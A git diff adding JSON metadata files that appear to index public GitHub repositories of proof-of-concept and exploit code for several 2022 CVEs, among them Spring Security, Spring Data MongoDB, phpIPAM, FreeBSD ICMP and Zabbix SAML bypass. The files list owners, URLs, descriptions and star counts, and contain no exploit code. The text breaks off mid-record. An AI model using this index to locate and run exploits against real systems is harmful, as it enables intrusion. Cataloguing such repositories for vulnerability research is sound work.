"2022-05-10T18:01:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22978.json b/2022/CVE-2022-22978.json new file mode 100644 index 0000000000..09f5cca840 --- /dev/null +++ b/2022/CVE-2022-22978.json @@ -0,0 +1,224 @@ +[ + { + "id": 498169934, + "name": "CVE-2022-22978", + "full_name": "DeEpinGh0st\/CVE-2022-22978", + "owner": { + "login": "DeEpinGh0st", + "id": 34375573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34375573?v=4", + "html_url": "https:\/\/github.com\/DeEpinGh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DeEpinGh0st\/CVE-2022-22978", + "description": "CVE-2022-22978 Spring-Security bypass Demo", + "fork": false, + "created_at": "2022-05-31T03:14:55Z", + "updated_at": "2024-08-26T12:35:26Z", + "pushed_at": "2022-06-02T07:29:14Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 499886197, + "name": "CVE-2022-22978-PoC", + "full_name": "ducluongtran9121\/CVE-2022-22978-PoC", + "owner": { + "login": "ducluongtran9121", + "id": 62114461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62114461?v=4", + "html_url": "https:\/\/github.com\/ducluongtran9121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ducluongtran9121\/CVE-2022-22978-PoC", + "description": "PoC of CVE-2022-22978 vulnerability in Spring Security framework", + "fork": false, + "created_at": "2022-06-04T16:57:18Z", + "updated_at": "2024-07-06T13:08:25Z", + "pushed_at": "2022-06-04T17:14:05Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-22978", + "spring-boot", + "spring-security" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513515771, + "name": "CVE-2022-22978", + "full_name": "aeifkz\/CVE-2022-22978", + "owner": { + "login": "aeifkz", + "id": 2063610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2063610?v=4", + "html_url": "https:\/\/github.com\/aeifkz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeifkz\/CVE-2022-22978", + "description": "CVE-2022-22978 POC Project", + "fork": false, + "created_at": "2022-07-13T12:38:26Z", + "updated_at": "2023-11-29T07:24:06Z", + "pushed_at": "2022-07-14T02:21:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608016738, + "name": "CVE-2022-22978", + "full_name": "umakant76705\/CVE-2022-22978", + "owner": { + "login": "umakant76705", + "id": 31900360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31900360?v=4", + "html_url": "https:\/\/github.com\/umakant76705", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/umakant76705\/CVE-2022-22978", + "description": null, + "fork": false, + "created_at": "2023-03-01T06:21:56Z", + "updated_at": "2023-03-17T15:20:20Z", + "pushed_at": "2023-03-01T06:22:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614770479, + "name": "CVE-2022-22978", + "full_name": "Raghvendra1207\/CVE-2022-22978", + "owner": { + "login": "Raghvendra1207", + "id": 128030511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128030511?v=4", + "html_url": "https:\/\/github.com\/Raghvendra1207", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Raghvendra1207\/CVE-2022-22978", + "description": null, + "fork": false, + "created_at": "2023-03-16T09:34:17Z", + "updated_at": "2023-03-16T09:34:49Z", + "pushed_at": "2023-09-08T10:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801924792, + "name": "CVE-2022-22978-demo", + "full_name": "wan9xx\/CVE-2022-22978-demo", + "owner": { + "login": "wan9xx", + "id": 65795483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65795483?v=4", + "html_url": "https:\/\/github.com\/wan9xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wan9xx\/CVE-2022-22978-demo", + "description": "CVE-2022-22978漏洞实例代码", + "fork": false, + "created_at": "2024-05-17T07:26:54Z", + "updated_at": "2024-05-20T03:52:35Z", + "pushed_at": "2024-05-20T03:52:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836181828, + "name": "CVE-2022-22978", + "full_name": "BoB13-Opensource-Contribution-Team9\/CVE-2022-22978", + "owner": { + "login": "BoB13-Opensource-Contribution-Team9", + "id": 177111000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177111000?v=4", + "html_url": "https:\/\/github.com\/BoB13-Opensource-Contribution-Team9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BoB13-Opensource-Contribution-Team9\/CVE-2022-22978", + "description": "CVE-2022-22978's Nuclei-Template", + "fork": false, + "created_at": "2024-07-31T10:12:33Z", + "updated_at": "2024-07-31T10:12:34Z", + "pushed_at": "2024-07-31T10:12:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22980.json b/2022/CVE-2022-22980.json new file mode 100644 index 0000000000..2193efabc9 --- /dev/null +++ b/2022/CVE-2022-22980.json @@ -0,0 +1,188 @@ +[ + { + "id": 505817178, + "name": "CVE-2022-22980", + "full_name": "trganda\/CVE-2022-22980", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/CVE-2022-22980", + "description": "Poc of CVE-2022-22980", + "fork": false, + "created_at": "2022-06-21T11:39:13Z", + "updated_at": "2024-03-05T11:29:17Z", + "pushed_at": "2022-06-23T09:53:01Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505824609, + "name": "Spring-Data-Mongodb-Example", + "full_name": "kuron3k0\/Spring-Data-Mongodb-Example", + "owner": { + "login": "kuron3k0", + "id": 10822857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10822857?v=4", + "html_url": "https:\/\/github.com\/kuron3k0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuron3k0\/Spring-Data-Mongodb-Example", + "description": "CVE-2022-22980环境", + "fork": false, + "created_at": "2022-06-21T12:02:00Z", + "updated_at": "2024-08-12T20:24:20Z", + "pushed_at": "2022-07-14T07:26:04Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 506146087, + "name": "Spring-Data-Mongodb-Demo", + "full_name": "li8u99\/Spring-Data-Mongodb-Demo", + "owner": { + "login": "li8u99", + "id": 37184853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37184853?v=4", + "html_url": "https:\/\/github.com\/li8u99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/li8u99\/Spring-Data-Mongodb-Demo", + "description": "CVE-2022-22980环境", + "fork": false, + "created_at": "2022-06-22T07:39:42Z", + "updated_at": "2024-08-12T20:24:22Z", + "pushed_at": "2022-06-22T07:45:29Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 506149832, + "name": "cve-2022-22980", + "full_name": "jweny\/cve-2022-22980", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/cve-2022-22980", + "description": "CVE-2022-22980 exp && 靶场", + "fork": false, + "created_at": "2022-06-22T07:51:22Z", + "updated_at": "2024-08-12T20:24:22Z", + "pushed_at": "2022-06-22T08:20:35Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 508463322, + "name": "CVE-2022-22980", + "full_name": "murataydemir\/CVE-2022-22980", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2022-22980", + "description": "[CVE-2022-22980] Spring Data MongoDB SpEL Expression Injection", + "fork": false, + "created_at": "2022-06-28T21:42:35Z", + "updated_at": "2024-08-12T20:24:35Z", + "pushed_at": "2022-06-28T22:27:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513546145, + "name": "Spring_cve-2022-22980", + "full_name": "Vulnmachines\/Spring_cve-2022-22980", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Spring_cve-2022-22980", + "description": "spring data mongodb remote code execution | cve-2022-22980 poc", + "fork": false, + "created_at": "2022-07-13T14:07:26Z", + "updated_at": "2023-11-30T08:56:54Z", + "pushed_at": "2022-07-13T14:13:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23046.json b/2022/CVE-2022-23046.json new file mode 100644 index 0000000000..78d1c77673 --- /dev/null +++ b/2022/CVE-2022-23046.json @@ -0,0 +1,126 @@ +[ + { + "id": 450827017, + "name": "CVE-2022-23046", + "full_name": "jcarabantes\/CVE-2022-23046", + "owner": { + "login": "jcarabantes", + "id": 9590425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9590425?v=4", + "html_url": "https:\/\/github.com\/jcarabantes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcarabantes\/CVE-2022-23046", + "description": null, + "fork": false, + "created_at": "2022-01-22T13:35:40Z", + "updated_at": "2022-02-16T08:00:53Z", + "pushed_at": "2022-01-24T17:29:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 459366538, + "name": "CVE-2022-23046", + "full_name": "dnr6419\/CVE-2022-23046", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2022-23046", + "description": "SQL Injection Vulnerability on PhpIPAM v1.4.4", + "fork": false, + "created_at": "2022-02-15T00:00:22Z", + "updated_at": "2023-01-22T10:15:22Z", + "pushed_at": "2022-02-15T00:25:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485887908, + "name": "phpipam_1.4.4", + "full_name": "hadrian3689\/phpipam_1.4.4", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/phpipam_1.4.4", + "description": "CVE-2022-23046 phpIPAM 1.4.4", + "fork": false, + "created_at": "2022-04-26T17:38:58Z", + "updated_at": "2023-01-03T01:54:55Z", + "pushed_at": "2022-09-20T15:34:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495567632, + "name": "CVE-2022-23046", + "full_name": "bernauers\/CVE-2022-23046", + "owner": { + "login": "bernauers", + "id": 44301851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44301851?v=4", + "html_url": "https:\/\/github.com\/bernauers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bernauers\/CVE-2022-23046", + "description": "Tinker Script for CVE-2022-23046", + "fork": false, + "created_at": "2022-05-23T20:44:15Z", + "updated_at": "2022-05-25T01:57:07Z", + "pushed_at": "2022-05-23T21:03:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23093.json b/2022/CVE-2022-23093.json new file mode 100644 index 0000000000..551c26ad0d --- /dev/null +++ b/2022/CVE-2022-23093.json @@ -0,0 +1,76 @@ +[ + { + "id": 608826023, + "name": "CVE-2022-23093", + "full_name": "Inplex-sys\/CVE-2022-23093", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-23093", + "description": "The FreeBSD ICMP buffer overflow, freebsd buffer overflow poc", + "fork": false, + "created_at": "2023-03-02T20:18:54Z", + "updated_at": "2024-11-17T22:17:14Z", + "pushed_at": "2023-03-25T17:41:13Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve-2022-23093", + "draytek-vigor-rce", + "exploit", + "exploits", + "freebsd", + "freebsd-exploit", + "icmp", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 775885856, + "name": "DrayTek-Exploit", + "full_name": "Symbolexe\/DrayTek-Exploit", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/DrayTek-Exploit", + "description": "CVE-2022-23093 FreeBSD Stack-Based Overflow", + "fork": false, + "created_at": "2024-03-22T08:38:40Z", + "updated_at": "2024-03-22T08:46:36Z", + "pushed_at": "2024-03-22T08:46:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23131.json b/2022/CVE-2022-23131.json new file mode 100644 index 0000000000..6efed3c01e --- /dev/null +++ b/2022/CVE-2022-23131.json @@ -0,0 +1,633 @@ +[ + { + "id": 460689920, + "name": "CVE-2022-23131", + "full_name": "qq1549176285\/CVE-2022-23131", + "owner": { + "login": "qq1549176285", + "id": 38514188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38514188?v=4", + "html_url": "https:\/\/github.com\/qq1549176285", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq1549176285\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-18T03:03:26Z", + "updated_at": "2022-02-18T03:03:26Z", + "pushed_at": "2022-02-18T03:03:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 460773028, + "name": "CVE-2022-23131", + "full_name": "jweny\/CVE-2022-23131", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2022-23131", + "description": "cve-2022-23131 exp", + "fork": false, + "created_at": "2022-02-18T08:38:53Z", + "updated_at": "2024-11-16T19:56:16Z", + "pushed_at": "2022-02-21T04:27:48Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 94, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 460833137, + "name": "cve-2022-23131", + "full_name": "Mr-xn\/cve-2022-23131", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/cve-2022-23131", + "description": "cve-2022-23131 zabbix-saml-bypass-exp", + "fork": false, + "created_at": "2022-02-18T11:51:47Z", + "updated_at": "2024-08-14T04:30:19Z", + "pushed_at": "2024-08-11T18:14:56Z", + "stargazers_count": 150, + "watchers_count": 150, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 150, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 460891453, + "name": "CVE-2022-23131", + "full_name": "1mxml\/CVE-2022-23131", + "owner": { + "login": "1mxml", + "id": 94277520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94277520?v=4", + "html_url": "https:\/\/github.com\/1mxml", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1mxml\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-18T14:48:53Z", + "updated_at": "2024-10-01T19:30:30Z", + "pushed_at": "2022-02-19T03:14:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 461681428, + "name": "cve-2022-23131", + "full_name": "zwjjustdoit\/cve-2022-23131", + "owner": { + "login": "zwjjustdoit", + "id": 50495555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4", + "html_url": "https:\/\/github.com\/zwjjustdoit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwjjustdoit\/cve-2022-23131", + "description": "poc", + "fork": false, + "created_at": "2022-02-21T02:42:23Z", + "updated_at": "2024-09-02T11:20:46Z", + "pushed_at": "2022-02-21T04:55:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462095141, + "name": "cve-2022-23131", + "full_name": "L0ading-x\/cve-2022-23131", + "owner": { + "login": "L0ading-x", + "id": 55682875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55682875?v=4", + "html_url": "https:\/\/github.com\/L0ading-x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L0ading-x\/cve-2022-23131", + "description": "cve-2022-23131", + "fork": false, + "created_at": "2022-02-22T01:39:52Z", + "updated_at": "2024-09-11T07:48:24Z", + "pushed_at": "2022-02-22T01:45:34Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462818933, + "name": "cve-2022-23131-exp", + "full_name": "random-robbie\/cve-2022-23131-exp", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/cve-2022-23131-exp", + "description": "Zabbix SSO Bypass", + "fork": false, + "created_at": "2022-02-23T16:34:03Z", + "updated_at": "2024-08-12T20:20:57Z", + "pushed_at": "2022-02-23T16:37:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 463061723, + "name": "CVE-2022-23131", + "full_name": "trganda\/CVE-2022-23131", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-24T08:10:46Z", + "updated_at": "2022-02-25T06:42:32Z", + "pushed_at": "2022-02-24T11:50:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 463123908, + "name": "CVE-2022-23131", + "full_name": "pykiller\/CVE-2022-23131", + "owner": { + "login": "pykiller", + "id": 38202442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38202442?v=4", + "html_url": "https:\/\/github.com\/pykiller", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pykiller\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-24T11:34:27Z", + "updated_at": "2024-09-15T03:17:48Z", + "pushed_at": "2022-02-24T11:59:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464117448, + "name": "zabbix-cve-2022-23131", + "full_name": "Fa1c0n35\/zabbix-cve-2022-23131", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/zabbix-cve-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-27T11:30:53Z", + "updated_at": "2023-12-08T02:32:32Z", + "pushed_at": "2022-02-27T11:31:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464439372, + "name": "CVE-2022-23131", + "full_name": "kh4sh3i\/CVE-2022-23131", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2022-23131", + "description": "Zabbix - SAML SSO Authentication Bypass", + "fork": false, + "created_at": "2022-02-28T10:37:02Z", + "updated_at": "2024-11-18T06:33:17Z", + "pushed_at": "2022-03-31T20:17:36Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "authentication", + "cve", + "dork", + "nuclei", + "nuclei-templates", + "saml", + "sso", + "zabbix", + "zabbix-agent" + ], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477136317, + "name": "CVE-2022-23131", + "full_name": "Kazaf6s\/CVE-2022-23131", + "owner": { + "login": "Kazaf6s", + "id": 49508660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49508660?v=4", + "html_url": "https:\/\/github.com\/Kazaf6s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kazaf6s\/CVE-2022-23131", + "description": "CVE-2022-23131漏洞利用工具开箱即用。", + "fork": false, + "created_at": "2022-04-02T18:16:56Z", + "updated_at": "2024-08-12T20:22:06Z", + "pushed_at": "2022-04-02T19:00:40Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516626302, + "name": "CVE-2022-23131poc-exp-zabbix-", + "full_name": "SCAMagic\/CVE-2022-23131poc-exp-zabbix-", + "owner": { + "login": "SCAMagic", + "id": 51362701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51362701?v=4", + "html_url": "https:\/\/github.com\/SCAMagic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SCAMagic\/CVE-2022-23131poc-exp-zabbix-", + "description": "CVE-2022-23131漏洞批量检测与利用脚本", + "fork": false, + "created_at": "2022-07-22T05:48:23Z", + "updated_at": "2024-01-02T01:19:26Z", + "pushed_at": "2022-07-22T05:55:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531935227, + "name": "Zabbix-CVE-2022-23131", + "full_name": "Vulnmachines\/Zabbix-CVE-2022-23131", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Zabbix-CVE-2022-23131", + "description": "Zabbix-SAML-Bypass: CVE-2022-23131", + "fork": false, + "created_at": "2022-09-02T13:24:13Z", + "updated_at": "2022-10-17T16:23:15Z", + "pushed_at": "2022-09-02T13:26:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586260198, + "name": "cve-2022-23131", + "full_name": "wr0x00\/cve-2022-23131", + "owner": { + "login": "wr0x00", + "id": 86941613, + "avatar_url": 